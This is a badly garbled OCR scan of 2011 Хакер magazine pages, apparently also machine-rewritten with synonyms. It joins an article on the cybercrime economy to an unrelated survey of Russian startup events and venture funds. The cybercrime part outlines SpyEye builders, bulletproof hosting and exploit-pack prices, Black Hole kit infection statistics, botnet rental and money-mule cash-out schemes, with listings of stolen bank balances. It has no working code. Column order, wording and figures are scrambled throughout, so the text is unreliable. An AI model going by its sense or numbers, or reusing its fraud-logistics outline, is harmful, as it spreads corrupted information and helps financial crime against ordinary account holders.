:~

серверам !б инструмент ет идеже похостить приказной носитель ботнета) .

.

Pantiflck

Впо из ледне е времяпоп улярн ос тьнабираетпродажа

Spyf ye .1.1.39

сплетня , так естьукраденныхданных по отношению паспортах, пр что касается писке,

Spyfyt .l.l .SO

u.-• (http:/t - .s.nctsp- .COI"I"Y"fole/nNo>
0(-.;кряоr;н"f"Т\t ?

0361"1yacaei!Spy fyt.8Jit(t....,ttит0Uttt6кa}
(окi"ОО е о.нбкоN"" s eкp.п~tn.)

036/"lya:eell Spyf yePtlth..t Jie
0

0 .Лept)611Jac•eнSpyEye .tJit

PASSNIТclиe.COII

l t "GPICPIIK8ZerQf1tg

infect
01WI

со

exploot.in? бе} o::onnenop e

некто fМ"IUO ..е стоит.

Sltht
http :l/vuk\es .c:om/~<id .phpJ"t-861 • fJТ 0::01У>К10Р Н

-

MO::Ofepw8

IМIAJIIOI

-·-

--

-

Pantifick
i 0tJ0::0Мfi(ТOP80Нtltl"lerOit8CТOI1Т ,

0 Аа 01 ero tPOll.t бы 01 ..е nродаю)) Ko.nnetCТOp, к..:"" у:«е скаs""" нiiЙТIIItf nРОбnем.

---

--

-------

0aefon
0 М0AJtl01

-----------

Allll SpyEye .

--

----- - --- -

- -

---------

Сnнсоо::ою.ау11еА :
cc:gr.ьtlff

""""

ftpNd!COtW!ect
usbspreьd
cnditgr..Ьbet"

b~~ngMmme

l bugreport

j 01afon
hlt

ОАНМ 0j) Хке

SpyEyt:

· SpyEye v1.0 .1 · (8uildet",o.t.Ь..Нe, ,onncyaЬ .t,ссеи
-Spyfyev1.0 .9 -(&ui1681"",WtbPanti, Colltctor .. .)

Р-1 ... )

· SpyEytv1.1.Э9[Crtcktdby AEO) · (Cr..:ked&uilder)

· Spyfye v 0.2.SO [Credted Ьу Zt~ ) · (&uilder + P.tch)
·Spyf yev 0.2.60[CredrtdbyAED) · (euilder + Patc:h)

081.

Новый паспорт, верно до сей времени из бесплатной доставкой?! В мнететакогодобра полно

ХАКЕР

00 / 053/2011

Баблона малвари

Чтобы у него самого неграмотный было проблем из законом, серверы
размещаются во странах из теп л ым, приятным климатом,

большим в количестве диких обезьян равным образом законами, которые
неприветствуютвторжениеиностранныхспе ц службна

сувереннуютерри т орию страны равно плохо по отношению п исы во ают, ч т по части но
т акое кибепреступность , умыкание денежек да п рочих п рият н ых
вещей посредством интернет. Стоит ли говорить, что такое? будочник таких
стран, как бы правило, н е больше всего говорит по-английски да малограмотный осо­

потому что в соответствии с л ьзуе тся электронной почтой.

Пуленепробиваемый lабузоустойчивыйl хостинг - са ­
мая дорогая объект во типичном криминальном мероприятии.

В сре д нем возлюбленный обойдется на 000 американских долларов на ме­
сяц . Можно дороже, не возбраняется меньше . В целом возьми благополучный
Тlowo :

..,... ,, . .. ... ....:

07<1:""

...." . ........

lCi~(l99t,Z..,oro)

приобретение информации, вытянутый в времени, надозаклады­
ва тьн есколькотысяч д олларов.

Далее во случае массовой атаки la они больше распростра­
нены на целях наживы равным образом подле нежелании потомдолго мотать срок

Ехр-штука порядочно известн ая да доволь н ол е гкодо ст упная

з тюрьме! берется какой- н ибуд ь свеже н ький эксплоит-пак

!он но «к раймвар-пак >> J , который-нибудь ставится получи текущий самый хо­
месте жительства, номерах страховок равным образом прочее. Ты никак не по­

стинг. Можнодаже за единый вздох сметь весь готовое, предустанов­

вери ш ь, же огромное числотупых юзеров сканируют п аспор т,

ленное. Н ет т олько п ейлоа д а, ведь лакомиться малый вари, со помо щ ью

кредитки, пенеионное страхование, ИН Н да остальные документы

ко т орой да утекут данные. Эксплоит-паки , кстати, позволяется

равным образом оставляютэти сканы в винте. А попозже реальные преступ­

достатьдаже на заграничный счёт . Но неравно твоя милость хочешь, с намерением во них

ники, получив сканы, выкачанныетем а Zeus"oм, ра д остно

были свежие уязвимости, а сие порядочно сплошь и рядом залогуспеха,

делаюте сего хозяйства клоны, вестимо же, от фоткой запрет ­

топридетсяза п латить.Около1300-1500баксов.

чика. Для ряда стран их можнодаже зарегить на базе полиции!

В киберпреступники ничуть дебилов неграмотный берут, в такой мере который

Так почто сложение гражданином Америки !ну либо — либо п об крайней мере

очевидно, в чем дело? умышленник понимает, что такое? получи компе

сообразить туд а получи П МЖ I мож н что касается ради какие-то 0 000долла р ов.

жертвы игра стоит свеч какой- н ибудь антивирус. П оэтому, разра­

При этом понятно, вроде практично по сию пору зто во рамках масштаб­

батывая малварь равным образом криптуя поуже имеющуюся , злокозненный

утнапиштим операции: некоторый Вася около именем Джана Смита въез ­

гаденыш долженствует прогнать исход вследствие противовирусный

жает на стра н у, уво д равным образом т миллио н баксов со вз л оманно г что касается со ч е т а,

мультиска н ер. Н ай т да такое услуга на равным образом н тернете на различных

получай кто сии монета перевели не без; другого счета, равным образом бестревожно

реализациях неграмотный составляет труда : сие может состоять облачное

уезжаетдомой . Полицияприезжаеткнивчемне п овинному

решение, может бытьлокальный из офт, дозволительно расплатиться из-за

ло ш куСмиту, п маг и волшебник п по отношению р т ко т оро гоукрали да аккау н т ко так р касательно го

сие д ене г, а мож н насчёт использовать в своих интересах сейчас предварительно укра д ен­

был взломан, да начинаетставить его во бог неудобное поло­

ным !Напомним, что такое? т ото но вирустотал - рес у рс , показатели

жение . При этом отрыть и концы в воду Васи по существу н ереально .

скоторогоутекаютвантивирусныекомпании,поэтому

В общем, какты еще п онял, во сеуд об н в отношении да п по части ролям. Е сли твоя милость
безграмотный годяй равным образом тебе тянет узнать судьбу, твоя милость може ш ь выбрат ь
до сей времени равно профессию мула, равным образом самоуправно дать на лапу ворованных карточек,

приватную малвар ь н а нем никак не т есть т ят. - П рим. ре д . l . Е из л равно
хочетсягарантий,тообычно п латятоколо500баксов .
Чтобы набросать иначе закриптовать уникальную мал­

ипойтисниматьнали ч куиликупитьнаних 0 00айфонови

варь, придется выложить до настоящий поры баксов

000. Зато, что зто н равно

заповедать их себя домой. Б ез муло в, собст во е н но, никуда, на томище

п ечально чтобы производителей антивирусов, ни сам объединение себе изо

случае ежели п реступник хочет п олучить реальные д еньги.

них ее, вернее всего, неграмотный поймает во направление в качестве кого минимальное значение

а
Хочешьпод е струить вместе с автор
н ай д е нн ы м э кс­
пл ои в таком случае м ? Этолишь
одиночный равным образом з вариантов ,
идеже можнооставить

да нформацию

Длятого ради тебе из чего явствует п что до н ятно, вроде весь э т равно винтики
образую т прекрасно ажен н ый мягкая рухлядь н изм, д авай рассмотр равным образом м п уть ко

легкимденьгам с введение предварительно конца, так, какесли бы определённый
уголовник решил непри н ужде н нообогатиться, вос­

по части л ьзовав ш исьсвободойиб ла гамиинтер н ета.

HOWTO NOTTO 00
Сразу об говоримся, ась? на се рас п исано прибл изите л ь н о, вместе с по части п ре ­

деленными допущениями равным образом во рамкахузкого сценария. Знатоки

состояние la нас во аюшки? бы в таком случае ни стало полистываютитакиеl могут заключить пари равно
раскопать кучу н еточ н остей, а повторюсь: гл ав ны й см ы сл-дать
по мнению н ять, в духе вседовольнолегко равно прибыльно.
Д ляначалакиберпреступникивыбираютжертв~или

касательно д ну, не в таком случае — не то куда м н ого. От сие го зависит, какони собираются
загребать золото : быстрозаодинразилипос т е п еннозасчет
большого числа юзеров. Как следствие, меняется да фрукт атаки:
таргетированная либо — либо ковровое бомбометание. В вместе с л учаетар ­
гетирова нн ой атаки рэнкинг собирается, равно как п равило, вместе с
социальных сетей, быть массовом подходе сие безграмотный до такой степени важно.
Дальше н адо ухлопать технические моме н ты, ведь есть т ь на правах

буд ет добыта информа ц ия с незадач л иво г по части юзера. Д ля н а­
чала берется что-то около называемый п уленепробиваемый хостинг.
Винтернетенатема т ическихфорумахпредложенийхоть
в отношении т бавляй. Дл пишущий эти строки объединение н има ни я: хаетеру по сию пору равно, что-нибудь вас дальше х р а­
н ите для серверах, рядом этом дьявол никак не будетсдавать вы полиции.

ХАКЕР

00/153/2011

085

MALWARE
Мулов ищут во книжка банке, аккаунты которого чистят.
Или могут похлопотать растворить аккаунт. При этом мул п о­

МАЛВАРЬНАПИСАНА,ХОСТИНГ

лучает

00-15% через снимаемой

деньги . Что дьявол делает потом?

Отправляет финансы произвольный платежной сис темой в виде

ЕСТЬ, ОСТАЕТСЯ ВОПРОС

Westeгп Unioп Саше Кузнецову ! сие , в духе ни странно, самые
рас п ространенные кличка равным образом семейство ради России] изо своей

РАСПРОСТРАНЕНИЯ

слякотный Америки во какую-нибудь раэвивающуюся страну
вроде России. Искать позднее Сашу-занятие бесполезное,

невыгодный говоря сейчас относительно том, аюшки? Саша может купитьлевый серпастый на
п ары дней, а сего достаточно, с намерением удалить от жертв

переходе равным образом надергать целое получай него.

Что отечественный н езаконопослушный Са удар имеет сверху выходе? Все

по сию пору самое интересное.

зависитотегожадности. Если у тебя мирово со арифметикой,

Итак, малварь написана , хостинг, гораздо планируется

собиратьданные в отношении кредитках да банковских счетах, есть,

твоя милость поуже посчитал , что такое? начальные вложения обойдутся наименьшее количество

остаетсявопросраспространения . Нетпроблем!Арендуем

во 0000 -7000долларов. Допустим, ботнетокучил

ботнет. Цены эависятотто г о, известный ли дьявол еще производи­

и так во реальности их, конечно, полноте чище . Те а американ­

телям антивирусных решений либо нет, какие твоя милость получишь

цы как например способности утысяч зеленых возьми карточке, безусловно имеют. Умножаем

надо ним права, как долго машин гарантиров ано на онлайне равно

юзеров бери деньги, отнимаем

проч ее. Ориентировка с целью начала- итого

ажно

000 баксов,

да

0000 юзе ров,

00-15 % бери мулов, павел учаем п усть
000 ОООдолларов чи стога ном . Покрывает7000 ? Мн е

кажется, вполне. При этом, повторимся, далеко не есть расчет забывать,

это, конечно, плохо-плохо .

почто киберпреступнику, некоторый решил целое сие провернуть, н е

Е сли киберпреступник больше всего умный, ведь затем п окупки
ботнета дьявол его модифицирует- криптует соглашение переда­

надлежит бытийствовать ни кодером, ни админом, не насчет частностей невыгодный следует являться носителем

чи данных , меняет отчего-то еще. Таким образом возлюбленный обезопасит

какими-то реальны ми техническими зна ниями .

себя ото ко идалова со стороны продавца ботнета. Это бросьте

МАСШТАБ ТРАГЕДИИ

быть достойным пока что мало-мальски сотен баксов у сделано прикормленных

программистов . Ботнетувяэываетсясэксплоит-паком ,

Как результат- малограмотный удивительно, благодаря чего СМИ соответственно всему миру,

равно понеслась : исходняк начинают повергаться для стопам держи неодобрительный

а во Америке во частности , ужас систематически рапортуюта бессчетно ­

сервер. Возникаетсамый первый вопрос: какобналичить

миллионныхубыткахсосторонычастныхпользователей

деньги? Очевидно, что-нибудь п еревод бери взломанные счета околесица

равным образом компаний. Одна всего только старушка Джон Буль отрапортовала ,

отнюдь не дает : сие до сей времени попросту прослеживается. П оэтому пре­

сколько потери через киберпреступности на ст ране оценивается на

ступники предпочитают совлекать д е ньги помощью мулов. Их от

млрд фунтов на год. Почем утак прои сходи т ? Про буют многие,

07

самого основные принципы разбойного плана начи н ают выслеживать объединение равно нету,

а ловят неграмотный весь х. Законы большинства стра н получи и распишись хо дят ся во

равно как правило, п од видом рекламки: <<Хочешь

таком помогите тоянии , почто объединение ним осуди ть пр йес т у пник а позволено тож

0000 баксов

на час? Тыкай на баннер!>>. Наверняка твоя милость видел кучутаких

услов н о, иначе только в пару лет. При этом никт что касается никак не требует

баннеров на интернете , притом почасту бери совершенно себя

вернутьвсехукраденныхдене~потомучтониктонезнае~

респектабельныхсайтах.

сколько стоит их не выделяя частностей было украдено . Морально да этически

Кто-то с денежных осликов сообразно нима ет, зачем делает, кто­

совер метать петли провинность на интернете проще: твоя милость н е смотри

жерт на у во лицо, подле этом многие хакеры любятиграть амплуа

то- нет. Ведь неравно преступники подходят ко делу от умом,

они составляюттрудовой пакт , по части которому рабочий

Рабин Гудов- наказывать, скажем, богатых америкосов возьми

простодолжен сниматьденьги во банках. Когда позже мула

скупость равно принципи ально, например, безграмотный атаковатьжителей

ловят-а ловят их с всегда, -те могутуйти во несознанку

единокровный страны !Хм ... а моя персона слы шал , что-то сие следом у, ась? во ближний

равным образом говорить: << Ну позвольте, мы а работалl Я да неграмотный знал, что-то сие

стране следовать сие порой отрезают щупальцы . -При м. ред.].

н езаконно! Вот у меня договор! Что вас говорите? Д еньги во­

Не хватит равным образом прославленный киберполиции-если на согласно сле период е

ровали?! Вотсволочи! Я добро помочь вам, ребята! Я из вами!

годы симпатия хо ть так стала появлять ся, ведь по-над взаимодей­

Накажем злодеев, всего-навсего гляди автор этих строк по отношению них сносно безвыгодный з наю, безвыездно

ствием подразделений соответственно всему миру междусобой покамест ра ­

беседа было в области электро нн ой почте >>. Такая переделка ужас

ботать да работать. При этом доза вопросов далеко не короче решена

а

типична , например, во Л атинской Аме рике. Там общий людей

ни ко гда с - следовать общеполитических препятствий : во вкусе не секрет

Любой авалист в коллекция

ведется потом первого раза прощать: разве неграмотный хотел смертный

изо хоро шего фильма << По сле прочтения сжечь>>, у США вышел

плохого, лукавый городок утал . Что же, моментально во тюрьму сажать?!

экстрадиции от Венесуэлой.::J:

равным образом совершенно во количестве

00$ For 000$ Balance

Bank of America.

0

~
~-

,1

•SJ)$tF.~r~soo.$~al_!ln.c~
Warrtanty : 0 Clay
Мах buy:3

Min buy: 0
ln Stock : 03
Buy With 0alance

000$ 0000$ 0500$ 0000$

Balance

086

0000$

00$ For 000$ Balance

00$ For 000$ Balance

cffibank

НSВС Ф

I L50.$tF.o.r (.S90.$LBa~n.c~

•SO,$tF.or•S.OO.$lBalitn.c.e

Mln buy: 0
ln Stock : 02

Warrtanty: 0 Clay
Мах buy : 00

Buy With 0alance
000$ 0000$ 0500$ 0000$ 0000$

Balance

00$ For 000$ Balance

!

Minbuy : 0
ln stock : 02

Warrtanty : 0 Clay
Мах buy : 00

Buy With 0alance
0005 0ooos 0500$ 0000$ 0000$

Balance

Min buy : 0
ln Stock : 02

Warrtanty: 0 Clay
Мах buy: 00

Вuу With

000$ 0ooos 0500$ 0000$

0alance
0000$

Balance

ХАКЕР

00/153/2 011

Сплоит-пак

Сплоит-паки служат на массового
заражения посетитетей сайтов
· после уязвимости во браузерах. Набор
эксплоитов

ЧТО ЭТО ТАКОЕ?

Black Hole ото русского парня

Раuпсhпоявилсячутьбольшегоданазад
равно сделано успел натворить счета шума .

0

СТАН1l111Кд

0(ackho(e 0"

L;]

начало:

ФАЙЛЫ

IIOT OKI1

L.1

Конец:

Ы ЗО nАСНОСТЬ

l·iiii!ФI!."i

СfАТИСТИ КА

ЗАГРУЗКИ

"Мit

JAVA SКYUNE >

05511

05.08 -

Jav~oeE >

02019

090758 хосты -

03979 ЗАГРУЗКИ

07.18

PDF LIВ"ПFF >

0452

04.59 -

Jav~ ТRUSТ >

0112

03.82

01837 хосты

0.22%

PDFALL >

0449

0.54

ПРОБИВ

Jav~SМВ >

0677

0979 ЗАГРУЗКИ

-

0.79

ПРОБИВ

0РАУЗЕРЫ !

ос

WindowsXP
Wr1dowsVIS121

ЗАГРУ3КМt"М>

051858

06442

052984

04"1606

04254

Wondows7

015214

094900

03188

WIПdows 0003

039

068

022

00.83
0.86
0.47 .

ЗОб

092

05

WIПdows 08

061

056

0

0. 03 .

01

09

что касается

0.00

02

l\Unux

03

потоки

defaut ,
019 >

относительно

02

ХИТЫ t

ЗАГРУЗКИ

051452

012616

02753

Сплоит-пак ведетподробную статис тику работы: учитываются развратница посе щаемость , сумма заражений,
кпд отдельных эксплоитов
равно ст.руктуратрафика.
Все блоки сданными представляют со -

01268

D
по части

позволено подключать/отключать, а

Chrome >

00921

08253

09

"""

-

"

0.39
04.32

Выбор нагрузокосновывается получай таких

критериях, вроде ОС, модификация браузера ,
государство происхождения, реферер вебсайта равно даже если сезон захода .
В орден ото конк урентов

Black Hole

имеетсистему лицензий . Водан годочек равным образом с-

"""

Firefox >

03138

08928

0432

MSIE >

052947

021683

09450

Мozila

09

03

0

03450

01989

013

0.62

0027

031

08

01.79

"""

)

0.56

ХИТ Ы

ХОСТЫ t

ЗАГРУЗКИ

098355

077091

06819

0.07

~

tnted IOngdom

026398

019465

0597

0.36

0!1

can~

04149

08333

0020

0.89

:с Spain

00086

09626

0791

02.80 .

01!1111 AustrМa

06593

04886

0278

0.14

0 0 Irotand

04427

03962

0109

05. 01

а switzorland

03385

02668

0096

0.65 .

:

01778

01519

0916

06.63 -

==~

00616

0608

097

00.38

:!;;

Norw~y

0679

0067

091

01.19 .

Egypt

0989

0900

044

09.27 -

0084

0626

098

02.93

-е Finlond

New Ze~land

""

08.60

СТРАН Ы

=

-

t:"

01.86 .

!i§ tJnl<!d 0121\<!s

NetherWxis

-

0.35 .

fJ

0.14 .

пользования стоит$1500, а право
держи полгода равным образом ко во артал-$1000 и$ 000.

брань настраиваемые виджеты , которые

ЗАГРУЗКИ

S..~ >

относительно . оо -

хосты

08708

хосты

0.00

по части

00114

ХИТ Ы

О Oper~ >

05.89 -

Windows 0000

SJI!WindowsМE

D

хост ы

062018

!1.

~ WIПdows 0"П

D

ХИТЫ

fJ
011
011

,,

[i]

neve r

0.44о/о

ЗА СЕГОДНЯ

01989 ХИТЫ r-

§;>!<!.~

эксплоиты

ЗА ВЕСЬ ПЕРИОД

031652 хиты С

Автообновпение:

НАСТ РОЙКИ

0215

0941

035

01.04

0734

0715

023

01.90

0411

0278

008

0699

0025

0054

вот и все изменять их месторасположение.

El
во

Black Hole во основном использует

D

распространенные равным образом прямым текстом доступныесплоиты. При этом онидают
вн у шительный прибыль проб ива.
Важной функцией являетс мы из -

щренный вместе с крипт про направления

трафика ITDSI, каковой используется
к направления польз ователей для

[J

В мае BlackHole Exploit Kit версии 0.0.2
ут ек во паблик,линкдля ее загрузки
опубликовал выгода thehackeгпews .
com. Это произошлочерез 0 недели
посл е публикации сорцов ZeuS.
За эксплуатация сплоитпака в области
н азначению не возбраняется извлечь давно 0 полет
недостатки свободы, соглас а статье
073УКРФ.

Е§:! Вrozil

Qatar

Друrое

0.13

03.13

мч;;;чщ;р

опре д еленным нагрузкам .

ХАКЕР

00 / 053/20 01

087

СЦЕНА

088

ХАКЕР

00/153/2011

Стартапы, деньжата равно счастье

отвергающая «Mifrill» Нефедова lmifrilltagameland.rul

О РОССИЙСКОЙ
СТАРТАП-СЦЕНЕ

Ни на одной другой породы сфере, по­
жалуй, блистает своим отсутствием столько возможно­

стей на старта, по образу на области
информационных технологий .
Здесь речьдаже невыгодный касательно возмож­

ности проделать феноменальную

апримерамиуспехадалекоходитьне

единомышленников, которые готовы не без; головой

нужно:

обмакнуться во план равно малограмотный останавливаться, все еще отнюдь не

Facebook да Мася Цукерберг,
Amazon да Джефф Безос, Twitteг да Джек

появится попервоначалу прототип, а следом сотрудничающий

Дорсиа. Все сии компании давно начинали едва-едва

бизнес? Как выступить получай консульта нтов-менторов ,

ли далеко не на гараже, от кодом, написанном просто-напросто

которые помогутсделатьтебе нечто, безграмотный только лишь

<<на коленке». Теперь а они превратились на

интересное, да сызнова равным образом способное пленять покорять

огромные бизнесы от умопомрачительной капи­

аудиторию равно поднимать доход? Чем при­

тализацией.

влечьтех людей, которые готовы помочь тебе от

Сегодня, если новые сервисы появляются, во вкусе

финансированием, ради проектом занимались

карьеру, работая во известных

лешье мясо послетермоядерного дождя, вокабула <<стар ­

компаниях. Нет! Это та сфера,

таn», особенно на российской действительности,

отряд изо профессионалов, которые действи­

себя что есть мочи дискредитировало. И действительно,

тельно способны произвести сотрудничающий продукт?

идеже компанию можешь разбудить

от случая к случаю твоя милость видишь, зачем

00 проектов изо 000 ни аза

Верный линия ко поиску ответов возьми сии вопро сы­

твоя милость сам. Довести простую идею

изо себя никак не представляют, твоя милость можешь подумать,

пить касательство во различных стартаперских

ась? всегда сии начинания- полная опошление . Но

мероприятиях. Мы подготовили пользу кого тебя емкий,

сие обманчиво. На Западе начинающих предпри­

так законченный осмотр те х, которые овчинка выделки стоит

нимателей хвалят да вслед совер шённые ошибки,

наведать на первую колонна .Но даже если тусовка­

так-таки пусть даже ошибка-это опыт. В этой статье я неграмотный

сие уже неграмотный главное. Важно, аюшки? сверх людей,

будем выболтать тебе атом, чтотакое стартап равным образом

которые хотятзапускать проекты, вкушать люди,

перед работающего прототипа,
опытный образец давно коммерческого

продукта, а изделие прежде рабо­
тающего бизнеса. И таковой стезя
не грех прошагать лишь из-за не­

в какой мере месяцев!

ХАКЕР

00/153/2011

неграмотный пара от половиной человека , а полноц енная

какдобитьсяуспеха.Едвалиэтоунасполучилось

готовые во сие вкладываться. В России без дальних слов

бы лучше, чем, для примеру, во книге <<Старта т> Гая

энергетически работают наравне частные инвесторы, беспричинно

Кавасаки, одного с первых работниковАррlе да

равным образом венчурные фонды, которые малограмотный без труда желают,

известноговенчурногоинвестора Силиконовой

а буквальножаждут встретить толковые команды,

долины. Но да мы не без; тобой хотим помочь тебе по чести сде­

которые не без; горящими глазами хотят олицетворить во

латьтусамуюпопыткусоздатьпроекъкоторый

бытье идею, которая на самом деле может пре­

попадет на мера <<один с десяти ». Как отрыть

вратиться на благополучный проект.

089

~ЦЕНА

МЕРОПРИЯТИЯ ДЛЯ СТАРТАПЕРОВ
Startup Weekend

SumiT

Startup Point

Организатор: «Главстарп>

Организатор: Клуб иннаваторов

Организатор : Staгtup

Сайт: гussia.staгtupweekend.oгg
Где: no всему миру, на книга числе на разных городах России
Когда: кривой годик

Сайт: sumit.гu
Где: Санкт-Петерб у рг

Сайт: staгtuppo i nt.гu
Где: отличаются как небо и земля города Ро ссии

,~J /

Wee~~~--

Startu

Когда : сезон

Когда : совершенный бадняк

Staгtup Weekeпd, за­

родившийся на Сиэтле,
круг общемировая.

Point

suм==·

Каждый такого склада << Уик-

..

энд», -это трехдневная

Клуб инноваторов-это
паче

0500 человек,
050 проектов, 000 экс­
пертов , 020 часов живых
встреч. SumiT делится

Встречи Staгtup Point
~

~аrtuр Point

nроводятсяодноимен-

ным крупнейшим
стартап-сообществом
рунета,которое

рабочая сессия, получи которую собираются команды

получи и распишись три этапа. В ходе нулевого, предварительного

начитываетболе е 00 ОООучастников , 0500+

интернет-проектов, специалисты, эксперты с

этапа собираются идеи равно формируются предва­

проектов, 000+ частных инвесторов равно венчурных

области IT да инвесторы. Здесь не грех по образу унаследовать

рительные составы команд. Затем cлeдyeтSumiT

фондов. Staгtup Pointyжe привлекли побольше $3 млн

совет, круглым счетом равно мобилизовать начальные инвестиции. Уик­

Weekeпd, представляющий своего рода обучаю­

инвестиций на отличаются как небо и земля nроекты. Поинты -это

энды проходяте вечера пятницы вплоть до вечера вос­

щую вводную передследующим этапом-Stагtuр

мероприятиянесоревновательные.Этоскорее

кресенья . Это спрессованный да оченьактивный

Магаthоп. Марафон длится месяц, да на ходе него

дискуссионная стапель на активистов, же­

лающих начатьсобственный затея , экспертов равным образом

формат, кой даетотличный гашиш со извлечь

команды работают надо проектами во комфортных

форсирование , необходимоедля воплощения мечта­

условиях. Проходят мастер-классы ведущих

инвесторов. Здесь дозволительно подцепить не без; новыми

ний на реальность. Например, в соответствии с результатам 02-го

специалистов в области разработке , менеджменту равным образом

людьми, обнаружить партнера , свести знакомство не без; инвесто­

<< Уик-энда >>, общество << Главстарт >> равным образом довольно пространный

продвиж~нию IТ-проектов, консультации до во всех отношениях

китайская крапива равно экспертами индустрии. Поинты состоят с

Морейнис, передовой стартап-инвестор России,

возникающим вопросам через команды SumiТ. В за­

презентаций стартапов на формате <<Eievatoг Pitch>>

дадуткомандамлучшихпроектовдо$100000на

вершение проходит lпvest Fest, получай котором коман­

02-минутная презентация на пороге инвестором! да

проект. Также <<Главстарт» является венчурным

ды представляютпроекты. В этом году сверху lпvest

докладов успешных предпринимате лей Success

партнером РВК !готов соинвестироватьдо 05%

Fest были приглашены инеест-фонды равным образом ведущие
!Т-компании: Ruпa Capital, Almaz, ABRT, ВТБ, Mail.

Stoгy. Проекты получаютфидбек ото аудитории да

ото общего объема требуемы х инвестиций! . <<Уик­
энды» проходят на разных городах России.

гu Gгoup, ЕМС, lпtel, РВК, RSVVentuгe Paгtneгs.

проекты на вложения средств.

экспертов. Инвесторы , во свою очередь, находят

ИНВЕСТИЦИОННЫЕ ФОНДЫ
Almaz Capital Partners

Runa Capital

Яндекс.Фабрика

Сайт: almazcapital com
Тип фонда: венчурный
Дельта инвестиций: -$100-500

Сайт: runacap.com/ru
Тип фонда: венчурных инвестиций nо посев н ой равно ранней стадии

Сайт: company.yandex . гulpubliclstaгtlfactoгy.xml
Тип фонда: во е нч у рныхинвес тиц ий nосевной равным образом ранней стадии
Дельта инвестиций: $50-100 твоя милость с.

( . AlmazCapital
R41eHtino;tltut..."CISitlnoQIIon
,,..,.~Potemltl

Дельта инвестиций: от$500до нескольких млн

Almaz Capital Рагtпегs­

Фондсоздан на августе

российскийвенчурный

001 О г. основателем

фонд, во 0008 г. осно­
ванный Александром

Галицким !учредитель да

~

Runa

"~ Capital

Paгallels да Асгопis

Сергеем Белоусовым

Я ндекс
-{!~

да основателем фонда

Яндекс .Фабрика, за­
нимаетсяинвестирова­

ни ем наравне на зарубежные,
приближенно да во российские
стартапь~связанные

не без; интернет-бизнесом, мультимедиа, навигацией

цийдlmаz Capital Paгtneгs равно инкубатора Runa Рагk,

Almaz Capital Paгtneгs Александром Галицким.
Runa Capital инвестирует на хай-тек-стартапы

на число которого входитФонд посевныхинвести­

ранней стадии развития. Управляющий сообщник

проекты милость Божия деке пьяный во школа годы накопить

ций Runa Capital; вместе с 0010 годы шишка Совета фонда

фонда-Дмитрий Чихачев. Интересы Ruпa Capital

несколькомиллионовдолларов присреднем

<<Сколково>>; президентконференции Russian

направлены, заранее всего, возьми программное обе­

объеме финансирования получи и распишись стартап во $50-150тыс.

TechTouг20041. В 0008 г. количество фонда составлял

спечение, мобильные приложения равным образом интернет­

Компанию интересуют, во частности, новые модели

$125 м л н, с которых $60 млн вложили Cisco равным образом UFG
Asset Managemeпt . С тех пор запас инвестировал

сервисы. В численность партнеров фонда Runa Capital

бизнеса во интернете, мультимедийныетехноло­

входятболее20технологическихпредпринимате­

гии !распознавание лиц, штрихкодовl, передвижение

во компаниидрроllо Pгoject, Paгallels равным образом другие.

лей равным образом профессиональных инвесторов . Деятель­

равным образом социальные коммуникации, исследование равно структу­

Офисы Almaz Capital Paгtneгs работают на Москве да

ность фонда поддерживает бизнес-инкубатор,

рирование информационных потоков, методики

Силиконовой долине. << Алмаз>> инвестирует на запруда о-

окончание которого взращивание конкурентоспособ­

изучения поведения пользователей на интернете,

дыеинновационныетехнологическиекомпании

ны х технологических компаний изо nерспективных

рекламные те хно логии , интерфейсные решения ,

во медийных равным образом телекоммуникационных отраслях

российских стартапов. Инкубатор получил на­

атакжеобработкаипредставлениеразличных

бизнеса натерритори равным образом России равным образом СНГ. В 0010-м запас

чин Runapaгk . Весной сего годы Runa Capital

данны х. УЯндекса кушать явный барыш для

инвестировал на комnанию Qik !мобильное видео!,

вложил $1 млн во чтение <<Метабар>> !инструмент

технологиям, которые емутяжело исследовать

проданную5kурев2011 мза$150млн.

в целях быстрого создания тулбаровдля браузеровl.

в утробе компании.

начальствующий сожитель фонда венчурных инвести­

090

да другими технологиями. На перспективные

ХАКЕР

00/153/2011

Стартаnы, денюжка да успе х

Во во всех отношениях мире круг проведения мероприятий пользу кого стартаперов­

на баталия равно представпять родной вариант нате вывод публики да инвесторов. Для

норма, одначе у нас касательно таких поинтах, похоже, немного который знает. А тем безвыгодный менее на

основные положения дозволяется поторчать нате мероприятиях во качестве зрителя,

России они равным образом существуют. Тутсовсем отнюдь не хоть умри зараз обрываться

пообщаться, смириться доклады, взглянуть бери преэентации.

Harvest

StartUp Week

Организатор : ателье веб-разработок Михаила Кечинова

Кто проводит: GгeenfieldPгoject

Сайт: hackday.гu
Где : ра з ные города России
Когда: шаровидный година

Са йт: gг ее nfiel d- р го ject. г u/harves t

Kтoпpoвoдит:STARTeuгope,lnitial Factoг. «ТехКранч Европа»
Сайт: sta гtupweek20JJ . com

Где: различные города России

Где: Вена, альпийская республика

HackDay

. . HackDay
""-"""""-м""""

Когда: корпулентный година

Когда : из 0 no 0 октября

Серия мероприятий

По форматустартап­

HackDay интересна

соревнование

своимформатом.Девиз

Harvest бог

похож получай стремитель­

«От идеи накануне макет а
за2дня»rово~и т самза

ный

Ha ckDay. Этотоже

0011

г.

В прекращение хоте сохач

.I{J?TARТUP
~ g.~ ~....-r..oteat~va~
WEEK

пр ограммасоздания

бы ВКЛЮЧИТЬ И ОДНО
нероссийскоемеро­

приятие, сие StartUp
Week Europe Fеstivаl­

себя. Форматфестиваля НасkDаубыл разработан

инновационных бизнес-проектов со нуля . За двуха

коммуникационнаяплоща дкадлястартапов

килоом паня ей

дня участники прогр аммы выбирают в особенности

Центра льной равно Восточной Европы . Конечно, неграмотный сверху

творческих идей сотрудников равным образом пр едстав л ения

интересные идеи, формируют проектные команды

каждое шаг чтобы стартапав поедешь после

прототипов топ-менеджменту. Мероприятия вы­

равно близ поддержке экспертов работают надо их реа­

границу, однако Вена н е что-то около литоринх далеко, равно лететьтуда

глядятнемного пр още пр едыду суп х. Здесьчаще

лизацией. На

ничуть безвыгодный таково накладно, как, например, во Штаты .

Ya hoo! вновь на 0005 г. про реализации

Harvest допускается настать со собстве нной

всегонетименитыхспикеровикрупныхинвесто­

идеей, которуюужедавно желательно реализовать.

А шаг приметно заслуживает внимания. Так,

ров, нетбитвы никак не держи жизнь, а получай вечное упокоение со соперни­

А не возбраняется сыскать команду единомышленников,

спикерами сверху StartUp Week выступятоколо

ками. Зато на этом месте глотать допустимость надергать попытка

поработатьсэкспертамиинаконецсдвинуть

европейскихэкспертовинтернет-индустри~

и, возможно, сосредоточить команду иначе говоря оказаться пригодным во

частный для ек т от мертвой точки. Организоторы­

серийных предпринимателей равным образом инвесторов. Среди

какой-то проект. Во всяком случае, организаторы

GreenfieldProject -это стартовая ринк пользу кого

